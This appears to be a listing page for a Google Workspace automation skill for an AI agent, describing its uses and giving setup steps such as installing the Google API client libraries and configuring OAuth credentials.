What is Google Workspace CLI Skill?

The google-workspace skill is a robust automation suite designed to bridge the gap between your AI agent and Google's productivity ecosystem. By utilizing Openclaw Skills, developers can programmatically interact with communication and data tools, enabling complex workflows like automated email processing, dynamic calendar management, and real-time spreadsheet updates. This skill transforms your agent into a powerful administrative assistant capable of handling document lifecycles and cloud storage operations.

Built on top of the Google API Client Library, this skill provides structured access to Gmail, Google Calendar, Google People API, Google Sheets, and Google Docs. It relies on a local agent utility to handle secure authentication and service communication, ensuring that your automated tasks are executed within a verified environment.

Google Workspace CLI Skill Use Cases

  • Automating client communications by sending, searching, and reading Gmail messages.
  • Managing team schedules by creating, listing, and deleting Google Calendar events.
  • Extracting data from Google Sheets for analysis or appending logs from external sources.
  • Generating reports and documents in Google Docs using placeholder replacement and batch updates.
  • Streamlining file management by uploading, downloading, and listing assets in Google Drive.

How Google Workspace CLI Skill Works

  1. Initialize the required openclaw-agent utility on your host machine to facilitate API communication.
  2. Configure a Google Cloud Project and obtain OAuth 2.0 credentials for secure access.
  3. Run the Python-based authentication helper to authorize the Openclaw Skills session via a browser.
  4. Use the provided CLI commands or script snippets to send requests to specific Google Workspace endpoints.
  5. Process the returned JSON data for local workflows or perform write actions directly to the cloud.

Google Workspace CLI Skill Setup

Prerequisites

Ensure you have Python 3 installed and the openclaw-agent running on your system.

1. Install Dependencies

pip install google-api-python-client google-auth-httplib2 google-auth-oauthlib

2. Configure Google Cloud

  • Create a project in the Google Cloud Console.
  • Enable the following APIs: Gmail, Calendar, Sheets, Docs, People, and Drive.
  • Create OAuth 2.0 credentials (Desktop app) and download credentials.json to your working directory.

3. Initialize Authentication

Create a google_auth.py helper to manage tokens. On the first run, a browser window will open for authorization, creating a token.pickle file for future use.
